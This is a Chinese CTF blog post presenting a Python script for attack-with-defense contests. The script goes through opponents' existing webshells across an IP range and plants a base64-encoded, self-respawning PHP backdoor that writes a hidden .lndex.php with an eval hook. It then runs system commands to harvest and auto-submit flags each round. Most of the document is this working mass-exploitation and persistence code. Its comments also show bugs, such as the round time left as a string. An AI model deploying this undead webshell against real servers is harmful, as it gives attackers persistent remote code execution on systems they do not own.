前几天祥云杯决赛,看到学弟们要跑好几个脚本,还得手动提交flag,浪费大量时间,以至于没有足够的时间来挖掘漏洞。所以搞了个脚本来简化一下操作。
注:本脚本是利用预留后门只起到辅助作用,不要过分依赖。掌握技术,挖掘漏洞才是最重要的。
0x00 脚本功能
- 利用预留后门批量上传不死马
- 自动激活不死马
- 根据设置的每轮比赛时间,自动获取flag并自动提交
0x01 脚本使用
在物理机上用python3跑就行
注:自动提交flag需在脚本里设置对应的post参数,不同比赛提交方式不一样,大家自行修改。
0x02 脚本代码
# -*- coding: utf-8 -*-
# SmoothAttack V1.0
# Author: 7i4n2h3n9
# Team: Polar Day Cyberspace Security LAB
import time
import requests
import webbrowser
# Starting Option
def welmemu():
    """Interactively collect the run settings from stdin.

    Returns a 6-tuple of raw strings, in this order: round time in
    minutes, ip segment, shell dir, http port, webshell password, token.
    Nothing is validated or converted here; callers receive exactly the
    text that was typed (the round time, for example, stays a str).
    """
    prompts = (
        'Please input the round time(min):',
        'Please input the ip segment(eg:192.169.10.2-192.169.10.40):',
        'Please input the shell dir(eg:/upload/1.php):',
        'Please input the port of http server:',
        'Please input the password of webshell:',
        'Please input the token:',
    )
    # Prompts are answered strictly in the order above.
    return tuple(input(question) for question in prompts)
def dir_re(shell_dir):
    """Swap the final '/'-separated segment of *shell_dir* for 'jjnb.php'.

    The replacement is done with ``str.replace``, so every occurrence of
    that last segment anywhere in the string is rewritten, not only the
    final one. An input that ends in '/' has an empty last segment, in
    which case ``replace('', ...)`` inserts 'jjnb.php' between every
    character; callers are expected to pass a path ending in a filename.
    """
    *_, last_segment = shell_dir.split('/')
    return shell_dir.replace(last_segment, 'jjnb.php')
#Ip Analysis
def ipAnalysis(ipl):
    """Expand 'A.B.C.x-A.B.C.y' into the address list A.B.C.x .. A.B.C.y.

    Only the last octet is enumerated. The first three octets always come
    from the left-hand address; the right-hand address contributes nothing
    but its last octet, so a range that crosses a /24 boundary is not
    expanded correctly. An inverted range (y < x) yields an empty list.
    No validation is performed on the input.
    """
    bounds = ipl.split('-')
    start_octets = bounds[0].split('.')
    end_octets = bounds[1].split('.')
    prefix = '.'.join(start_octets[:3])
    low = int(start_octets[3])
    high = int(end_octets[3])
    # range() upper bound is exclusive, hence the +1 to include y itself.
    return [f'{prefix}.{host}' for host in range(low, high + 1)]
# Upload BuSi Webshell
def upWebshell(ip: list[str], port: str, passwd: str, shell: str, bs_dir: str) -> list[str]:
    """Plant the persistent shell on every host in *ip*; return the hosts where it was found afterwards.

    Per host: POST ``pay`` through the already-present webshell at ``shell``
    (via conWebshell), open ``http://<host><bs_dir>`` in the local browser
    to trigger the dropped file, wait one second, then POST ``pay1`` and keep
    the host if the response text contains 'lndex'. Only the browser step is
    guarded; an exception from either POST propagates to the caller.

    Detection note: the artifact this leaves behind is a hidden
    ``.lndex.php`` under ``/var/www/html`` (that is what ``pay1`` searches
    for). The base64 body of ``pay`` appears to decode to a PHP loop that
    keeps re-creating that file after unlinking its own script — verify by
    decoding it. On the defending side, file-integrity monitoring of the web
    root and a PHP worker that survives removal of its script file are the
    observable signals.
    """
    suc_ipl = []
    # The md5 pass of busiwebshell is polarnight, post pass is jjnb
    pay = "file_put_contents('./jjnb.php',base64_decode('PD9waHAgIA0KICAgIHNldF90aW1lX2xpbWl0KDApOyAgDQogICAgaWdub3JlX3VzZXJfYWJvcnQoMSk7ICANCiAgICB1bmxpbmsoX19GSUxFX18pOyAgDQogICAgd2hpbGUoMSl7ICANCiAgICAgICAgZmlsZV9wdXRfY29udGVudHMoJy5sbmRleC5waHAnLCc8P3BocCBpZihtZDUoJF9HRVRbInBhc3MiXSk9PSJiMGQyOWQ4NTIyZWNiNGU2YTE1YTFiMGMwNmJjZDNkOSIpe0BldmFsKCRfUE9TVFtqam5iXSk7fSA/PicpOyAgDQogICAgICAgIHNsZWVwKDApOyAgDQogICAgfQ0KPz4'));"
    # Verification probe: lists the hidden file the dropped loop is expected to create.
    pay1 = "system('find /var/www/html -name .lndex.php');"
    for j in ip:
        url = 'http://' + j
        # Response of the drop request is never inspected; `r` is unused.
        r = conWebshell(url, shell, passwd, port, pay)
        bsd = url + bs_dir
        try:
            # The browser visit only serves as the trigger; the pause gives
            # it a moment before the verification request is sent.
            webbrowser.open(bsd)
            time.sleep(1)
        except:  # bare except: also swallows KeyboardInterrupt and SystemExit
            pass
        r1 = conWebshell(url, shell, passwd, port, pay1)
        # Presence of the filename in the output is taken as success.
        if 'lndex' in r1.text:
            suc_ipl.append(j)
    return suc_ipl
# Connecting Webshell
def conWebshell(url: str, shell: str, passwd: str, port: str, pay: str):
    """POST *pay* as the single form field named *passwd* to ``<url>:<port><shell>`` and return the Response.

    The second positional argument of ``requests.post`` is ``data``, so the
    body is sent form-encoded (``application/x-www-form-urlencoded``). No
    timeout is given, so an unresponsive host blocks the caller
    indefinitely, and the status code is not checked — callers read
    ``.text`` whatever the server answered. Note the parameter order
    (shell, passwd, port) differs from upWebshell's (port, passwd, shell).
    """
    payload = {
        passwd: pay
    }
    # *port* is expected to be a str here (it is concatenated, not formatted).
    url1 = url + ':' + port + shell
    response = requests.post(url1, payload)
    return response
def get_flag(ip: list[str], port: str, shell: str, passwd: str) -> list[str]:
    """Run ``system('getflag')`` through the shell on each host in *ip* and collect the raw response bodies.

    Response text is appended unfiltered, so an error page or empty body is
    collected as a "flag" just the same. Parameter order (port, shell,
    passwd) again differs from upWebshell and conWebshell.

    NOTE(review): this iterates *ip*, i.e. it expects a list of addresses.
    Its only caller, sub_flag, passes one address string per call, which
    iterates character by character and issues requests to ``http://1``,
    ``http://9``, ... rather than to the host.
    """
    flag = []
    g_flag_pay = "system('getflag');"
    for p in ip:
        url = 'http://' + p
        r = conWebshell(url, shell, passwd, port, g_flag_pay)
        flag.append(r.text)
    return flag
def sub_flag(r_time, ip: list[str], port: str, shell: str, passwd: str, token: str) -> None:
    """Endless submission loop: each round, pull flags from every host and POST them to ``f_url``.

    ``f_url`` is a placeholder scoring endpoint and, as the write-up says,
    the form fields ('flag', 'token') are contest-specific and have to be
    edited by hand. The loop never returns on its own; it ends only on an
    exception or Ctrl-C. Each response body is printed without any status
    check.

    NOTE(review): two defects are visible in the body. (1) ``get_flag`` is
    called with the single address ``q`` although it iterates its first
    argument, so the string is walked character by character. (2) ``r_time``
    arrives as the raw str returned by input() in welmemu, so ``r_time * 60``
    is string repetition and ``time.sleep`` raises TypeError at the end of
    the first round.
    """
    # Placeholder submit URL — replace with the contest's scoring endpoint.
    f_url = 'http://192.168.0.1'
    # The token is taken from the caller; nothing is set here.
    while True:
        for q in ip:
            flag_tmp = get_flag(q, port, shell, passwd)
            # flag_tmp is a list; presumably requests encodes it as repeated
            # 'flag' fields — confirm against what the scoring API expects.
            s_f_pay = {
                'flag': flag_tmp,
                'token': token
            }
            r = requests.post(f_url, s_f_pay)
            print(r.text)
        # Sleep for one round; see the NOTE above about r_time's type.
        time.sleep(r_time * 60)
if __name__ == '__main__' :
    # Entry point: prompt for settings, derive the companion shell path,
    # expand the IP range, plant the shell, then loop submitting flags.
    round_time, ip_list, shell_dir, http_port, shell_pass, token = welmemu()
    busi_dir = dir_re(shell_dir)
    # Form-field name used when talking to the dropped shell (see the
    # comment inside upWebshell).
    busi_passwd = 'jjnb'
    print(busi_dir)
    ip_seg = ipAnalysis(ip_list)
    #print(ip_seg)
    succe_iplist = upWebshell(ip_seg, http_port, shell_pass, shell_dir, busi_dir)
    print(succe_iplist)
    # round_time is still the raw str from input(); sub_flag sleeps on
    # round_time * 60, which is not a number as written.
    sub_flag(round_time, succe_iplist, http_port, busi_dir, busi_passwd, token)